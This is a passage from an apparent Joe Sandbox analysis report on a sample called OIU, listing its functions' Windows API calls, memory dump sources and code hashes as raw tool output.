                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFreeHeapLast_free
                                                                      • String ID:
                                                                      • API String ID: 1353095263-0
                                                                      • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                                      • Instruction ID: 6a98eed5da04092eb02a694fb9b90e83bdac62cc572db4118c5335e298d8b4ad
                                                                      • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                                      • Instruction Fuzzy Hash: 85E092361003059F8720CF6CD400A82F7F5EF94320720853AE89DE3310E331E812CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4F6D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      • Opcode ID: 04fdcc3eb9afffdf4ee60d1aedf11d51fcba5f06e99f2a16c6990c654fc0c756
                                                                      • Instruction ID: 21500f50dec0f38ffafcb2b33b58966c143d6ea654afe4d58f5d4c4c1a1df0a6
                                                                      • Opcode Fuzzy Hash: 04fdcc3eb9afffdf4ee60d1aedf11d51fcba5f06e99f2a16c6990c654fc0c756
                                                                      • Instruction Fuzzy Hash: AFF0A971009342CFCB348F20D4D0926BBE0EF4232932099BEE1EE82620C7B29844EF00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLongPathNameW.KERNELBASE ref: 00BA2DC4
                                                                        • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: LongNamePath_wcslen
                                                                      • String ID:
                                                                      • API String ID: 541455249-0
                                                                      • Opcode ID: 97b150eb587755d5b6787e175e2ad53dc8c3040c95d2b7ac1c4fd9cc4d802c97
                                                                      • Instruction ID: 7ff2aad9927b9c32ef9265d81173c0603f1f13ea7cd3baeb5a507e829f469df2
                                                                      • Opcode Fuzzy Hash: 97b150eb587755d5b6787e175e2ad53dc8c3040c95d2b7ac1c4fd9cc4d802c97
                                                                      • Instruction Fuzzy Hash: BCE0C2B2A042245BCB21A2989C06FEE77EDDFC8790F0400B1FD09E7248DA70AD8086A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C12693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: __fread_nolock
                                                                      • String ID:
                                                                      • API String ID: 2638373210-0
                                                                      • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                      • Instruction ID: 73931d5e4961ea489cebaffdaf34732921d92e89d4ee116c9e83bb36f9ad8383
                                                                      • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                      • Instruction Fuzzy Hash: AEE048B46097005FDF395A28A8517F677D49F4A300F00045EF5AB82352E5726855964D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BA3908
                                                                        • Part of subcall function 00BAD730: GetInputState.USER32 ref: 00BAD807
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00BA2B6B
                                                                        • Part of subcall function 00BA30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00BA314E
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                      • String ID:
                                                                      • API String ID: 3667716007-0
                                                                      • Opcode ID: e2f64e3a5cd8b4a281418dcec9ac47b860a156821fb4ecfade232dc197ec6bfd
                                                                      • Instruction ID: 0dfa7a4822861e06f2200394e4163edca7e75a1fda7a277f46385f1528906e64
                                                                      • Opcode Fuzzy Hash: e2f64e3a5cd8b4a281418dcec9ac47b860a156821fb4ecfade232dc197ec6bfd
                                                                      • Instruction Fuzzy Hash: E0E0863230C24407CA08BB78A8566BDA7D9DBD3751F4455BEF54753162CE2549494351
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BE039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,00BE0704,?,?,00000000), ref: 00BE03B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: d78bbfb6294b15b031dc30e3127ac009dde8d443daf58e21cdd09328d1cad1d2
                                                                      • Instruction ID: 3cc84f7dd9126b4b376c48b0668a263ad53a2109b4972fa5bb7d7412beff5882
                                                                      • Opcode Fuzzy Hash: d78bbfb6294b15b031dc30e3127ac009dde8d443daf58e21cdd09328d1cad1d2
                                                                      • Instruction Fuzzy Hash: F2D06C3205010DBBDF028F84DD46EDE3BAAFB48714F014000BE1866020C732E821AB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32 ref: 00BA1CBC
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: InfoParametersSystem
                                                                      • String ID:
                                                                      • API String ID: 3098949447-0
                                                                      • Opcode ID: 7709a27e67345eca47b616fb774b9322a94496ac67a05e789f7669d6458fb733
                                                                      • Instruction ID: 3610ffe388d51e4f088d85643309c2dd117da9d5fd5c58a8e247d8c4b16269eb
                                                                      • Opcode Fuzzy Hash: 7709a27e67345eca47b616fb774b9322a94496ac67a05e789f7669d6458fb733
                                                                      • Instruction Fuzzy Hash: 8DC09B36290304DFF3144B94BC4AF1C7754A348B00F044001F64D655F3C3A11450F750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C1744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00BA5773
                                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 00C176DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 1214770103-0
                                                                      • Opcode ID: 0c6ccfa3e4e4badac95642a3f0c40e76be4e9b942c864f3f3b930dab2e1f25b2
                                                                      • Instruction ID: d37116860e8317b45dde097dc74cd136926e98896a0ab53a70a60515c092b09b
                                                                      • Opcode Fuzzy Hash: 0c6ccfa3e4e4badac95642a3f0c40e76be4e9b942c864f3f3b930dab2e1f25b2
                                                                      • Instruction Fuzzy Hash: 858181306087019FCB14EF28C491BA9B7F1BF8A350F04465DF8965B292DB34EE85DB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BBFC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction ID: 182fe8f8996360e5b2391b347e9a4fb8961b35c0c630172aea8f7baf5e4578f7
                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction Fuzzy Hash: 6B31BD75A0010A9BC718CF59D880AB9FBE6FB49300B2486F5E809CB656D771EDC1CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 001122FC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 00112311
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457787818.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_110000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction ID: 2436dda43fbfd4e006e95c97404430caaaa607c6935cafd35b0f4569ef21dbe2
                                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                      • Instruction Fuzzy Hash: 70E09A7494010DAFDB00EFA4D5496EE7BB4EF04301F1005A1FD0596680DB309A648A62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00112300 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000001F4), ref: 00112311
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457787818.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_110000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction ID: e2df254de8c2fb3be45f9621f48da09837082d860dac535b2d744f78e974596e
                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                      • Instruction Fuzzy Hash: B4E0BF7494010D9FDB00EFB4D5496AE7BB4EF04301F100561FD0192280D73099608A62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 00C39576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C3961A
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C3965B
                                                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00C3969F
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C396C9
                                                                      • SendMessageW.USER32 ref: 00C396F2
                                                                      • GetKeyState.USER32(00000011), ref: 00C3978B
                                                                      • GetKeyState.USER32(00000009), ref: 00C39798
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C397AE
                                                                      • GetKeyState.USER32(00000010), ref: 00C397B8
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C397E9
                                                                      • SendMessageW.USER32 ref: 00C39810
                                                                      • SendMessageW.USER32(?,00001030,?,00C37E95), ref: 00C39918
                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C3992E
                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C39941
                                                                      • SetCapture.USER32(?), ref: 00C3994A
                                                                      • ClientToScreen.USER32(?,?), ref: 00C399AF
                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C399BC
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00C399D6
                                                                      • ReleaseCapture.USER32 ref: 00C399E1
                                                                      • GetCursorPos.USER32(?), ref: 00C39A19
                                                                      • ScreenToClient.USER32(?,?), ref: 00C39A26
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C39A80
                                                                      • SendMessageW.USER32 ref: 00C39AAE
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C39AEB
                                                                      • SendMessageW.USER32 ref: 00C39B1A
                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C39B3B
                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C39B4A
                                                                      • GetCursorPos.USER32(?), ref: 00C39B68
                                                                      • ScreenToClient.USER32(?,?), ref: 00C39B75
                                                                      • GetParent.USER32(?), ref: 00C39B93
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C39BFA
                                                                      • SendMessageW.USER32 ref: 00C39C2B
                                                                      • ClientToScreen.USER32(?,?), ref: 00C39C84
                                                                      • TrackPopupMenuEx.USER32 ref: 00C39CB4
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C39CDE
                                                                      • SendMessageW.USER32 ref: 00C39D01
                                                                      • ClientToScreen.USER32(?,?), ref: 00C39D4E
                                                                      • TrackPopupMenuEx.USER32 ref: 00C39D82
                                                                        • Part of subcall function 00BB9944: GetWindowLongW.USER32(?,000000EB), ref: 00BB9952
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00C39E05
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                      • String ID: @GUI_DRAGID$F$H`
                                                                      • API String ID: 3429851547-1055229456
                                                                      • Opcode ID: 3df74d4563ddc5ca1a98571fa8d6d019600d32d5bf2b6da34b7487a93eee6d5d
                                                                      • Instruction ID: 44eb61b8c8d0c5f2ad4016222db4732a933fbf9ffb495dad83f0e73121cbfec0
                                                                      • Opcode Fuzzy Hash: 3df74d4563ddc5ca1a98571fa8d6d019600d32d5bf2b6da34b7487a93eee6d5d
                                                                      • Instruction Fuzzy Hash: F9429D30225600AFD724CF28CC85FAABBF5FF49310F144619FAA9972A1D7B1A950CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C34873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00C348F3
                                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00C34908
                                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00C34927
                                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00C3494B
                                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00C3495C
                                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00C3497B
                                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00C349AE
                                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00C349D4
                                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00C34A0F
                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00C34A56
                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00C34A7E
                                                                      • IsMenu.USER32(?), ref: 00C34A97
                                                                      • GetMenuItemInfoW.USER32 ref: 00C34AF2
                                                                      • GetMenuItemInfoW.USER32 ref: 00C34B20
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00C34B94
                                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00C34BE3
                                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00C34C82
                                                                      • wsprintfW.USER32 ref: 00C34CAE
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C34CC9
                                                                      • GetWindowTextW.USER32 ref: 00C34CF1
                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C34D13
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C34D33
                                                                      • GetWindowTextW.USER32 ref: 00C34D5A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                      • String ID: %d/%02d/%02d
                                                                      • API String ID: 4054740463-328681919
                                                                      • Opcode ID: 70c523a670e091f4b7540ceaad2486d19caf78b355d5ef970f6e5b4d4d994119
                                                                      • Instruction ID: c72c2e1ee7cd4d64845e6dbd2c49cf0b99fb17f8a84928fffbf25588f27438f9
                                                                      • Opcode Fuzzy Hash: 70c523a670e091f4b7540ceaad2486d19caf78b355d5ef970f6e5b4d4d994119
                                                                      • Instruction Fuzzy Hash: 2512F171620214ABEB288F65CC49FBE7BF8EF49310F144169F525EB2E1DB74AA41CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BBF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 00BBF998
                                                                      • FindWindowW.USER32 ref: 00BFF474
                                                                      • IsIconic.USER32(00000000), ref: 00BFF47D
                                                                      • ShowWindow.USER32(00000000,00000009), ref: 00BFF48A
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00BFF494
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BFF4AA
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00BFF4B1
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BFF4BD
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00BFF4CE
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00BFF4D6
                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00BFF4DE
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00BFF4E1
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFF4F6
                                                                      • keybd_event.USER32 ref: 00BFF501
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFF50B
                                                                      • keybd_event.USER32 ref: 00BFF510
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFF519
                                                                      • keybd_event.USER32 ref: 00BFF51E
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFF528
                                                                      • keybd_event.USER32 ref: 00BFF52D
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00BFF530
                                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00BFF557
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
